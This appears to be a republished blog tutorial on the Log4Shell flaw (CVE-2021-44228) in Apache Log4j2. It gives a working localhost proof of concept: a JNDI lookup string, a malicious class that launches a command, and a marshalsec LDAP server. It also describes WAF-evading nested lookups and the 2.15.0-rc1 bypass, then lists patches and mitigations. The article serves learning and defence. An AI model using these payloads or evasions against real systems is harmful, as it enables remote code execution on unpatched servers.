Apache Log4j2 Remote Code Execution Vulnerability Exploitation Guide

This article introduces Apache Log4j2, explains the remote code execution vulnerability caused by unsafe JNDI lookups, provides step‑by‑step environment setup, PoC code, exploitation instructions, and outlines official patches and temporary mitigation measures for developers and security engineers.

Architecture Digest

1. Introduction: Apache Log4j2 is an open-source Java logging framework widely used in middleware, development frameworks and web applications. It is very often pulled in as a transitive dependency, so an application can be exposed without listing log4j-core in its own build file.

2. Vulnerability Overview: The vulnerability (CVE-2021-44228, widely known as Log4Shell) arises from Log4j2's message lookup substitution: when a log message contains a ${...} expression, Log4j evaluates it while formatting the message, and the jndi: lookup resolves names through JNDI, including from remote LDAP and RMI servers. An unauthenticated attacker who can get a string such as ${jndi:ldap://attacker-host/x} into any field that ends up in a log line (an HTTP header, a username, a search term) can make the server connect to a host they control, load attacker-supplied code and execute it, achieving arbitrary code execution.

3. Affected Versions: Apache Log4j 2.0-beta9 through 2.14.1, plus the incomplete fix candidate 2.15.0-rc1 (see section 9), i.e. every 2.x release up to and including 2.15.0-rc1. Log4j 1.x does not perform message lookups and is not affected by this particular issue.

4. Environment Setup: Create a new Maven project and add Log4j2 dependencies.

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <!-- 2.14.1 is the last vulnerable release; log4j-api is pulled in transitively -->
    <version>2.14.1</version>
</dependency>

5. Exploit PoC (save as LogTest.java):

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class LogTest {
    public static final Logger logger = LogManager.getLogger();

    public static void main(String[] args) {
        // Log4j2's default configuration (no log4j2.xml on the classpath) logs ERROR
        // and above to the console, so this message is guaranteed to be formatted.
        // During formatting the ${jndi:...} lookup is evaluated and the JVM connects
        // to the LDAP server on localhost:8888. In a real attack the string arrives
        // in user-controlled input (a header, a username, a search term) rather than
        // being hard-coded like this.
        logger.error("${jndi:ldap://localhost:8888/Exploit}");
    }
}

6. Compile the malicious class Exploit.class (save as Exploit.java; compile with a JDK whose class-file version the target JVM accepts, for example javac --release 8 Exploit.java on a newer JDK):

public class Exploit {
    // The static initializer runs as soon as the victim JVM loads the class from
    // the attacker's HTTP server, before any constructor is called.
    static {
        System.err.println("Pwned");
        try {
            String cmds = "calc"; // Windows calculator, as in the original demo
            Runtime.getRuntime().exec(cmds);
        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

javac Exploit.java

7. Serve the directory containing Exploit.class over HTTP on 127.0.0.1:7777 (any static file server will do, for example Python's built-in http.server module), then start a malicious LDAP server with marshalsec. It listens on port 8888 and answers the lookup for "Exploit" with a JNDI Reference whose codebase points at the HTTP server:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:7777/#Exploit" 8888

8. Run the PoC Java program. Log4j resolves ${jndi:ldap://localhost:8888/Exploit}, JNDI queries the LDAP server, marshalsec answers with a Reference whose javaCodeBase is http://127.0.0.1:7777/, and the JVM downloads Exploit.class from there and instantiates it, which runs the static initializer and the embedded command (here, launching the calculator). Note that this remote-codebase path only works when the JVM trusts URL codebases for LDAP, i.e. on JDKs older than 8u191 / 11.0.1 or with com.sun.jndi.ldap.object.trustURLCodebase=true; see the caveat under section 10.

9. Bypass notes: The first fix candidate, 2.15.0-rc1, restricted JNDI lookups to an allowlist of protocols and hosts (localhost by default), but the check could be skipped: a lookup string that was not a syntactically valid URI made the validation throw, the exception was caught, and the lookup still proceeded. Obfuscated lookup strings built from other StrLookup variations (for example nesting ${lower:...} or ${::-...} defaults to spell out "jndi") also defeat naive pattern matching on the literal text. The validation bug was fixed in 2.15.0-rc2, which shipped as 2.15.0.

10. Fixes: Upgrade. 2.15.0-rc2 (released as 2.15.0) was the first fix, but it was itself followed by further CVEs, so the current recommendation is 2.17.1 or later for Java 8+, 2.12.4 for Java 7 and 2.3.2 for Java 6; these releases disable JNDI by default and no longer evaluate lookups inside log messages at all. Where an immediate upgrade is impossible, the following temporary mitigations apply, each with its limits:

Add the JVM option -Dlog4j2.formatMsgNoLookups=true (or set the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS=true). This only takes effect on 2.10 through 2.14.1; older releases silently ignore it.

Place a log4j2.component.properties file on the classpath containing log4j2.formatMsgNoLookups=true. Same version restriction as above. Both settings were later found insufficient for non-default configurations whose pattern layout or appenders use context lookups such as ${ctx:...} (CVE-2021-45046); the mitigation the Log4j project recommends for any version is to delete org/apache/logging/log4j/core/lookup/JndiLookup.class from the log4j-core jar and restart the JVM.

Use JDK 11.0.1, 8u191, 7u201, 6u211 or later. These releases set com.sun.jndi.ldap.object.trustURLCodebase=false, which blocks the remote class loading this PoC relies on. They do not block exploitation through a serialized Java object returned in the LDAP response and deserialized with gadget classes already on the target's classpath, so treat the JDK version as hardening, not as a fix.

Deploy WAF or other filtering products for additional protection. Signature matching on the literal ${jndi: is easy to evade with nested lookups such as ${${lower:j}ndi:...}, so filtering is defence in depth only; the vulnerable library still has to be fixed.

Republication Notice

This article has been distilled and summarized from source material, then republished for learning and reference. If you believe it infringes your rights, please contact admin@besthub.dev and we will review it promptly.

Tags: java, Remote Code Execution, Mitigation, log4j2, Exploit, Security Vulnerability
Written by

Architecture Digest

Focusing on Java backend development, covering application architecture from top-tier internet companies (high availability, high performance, high stability), big data, machine learning, Java architecture, and other popular fields.
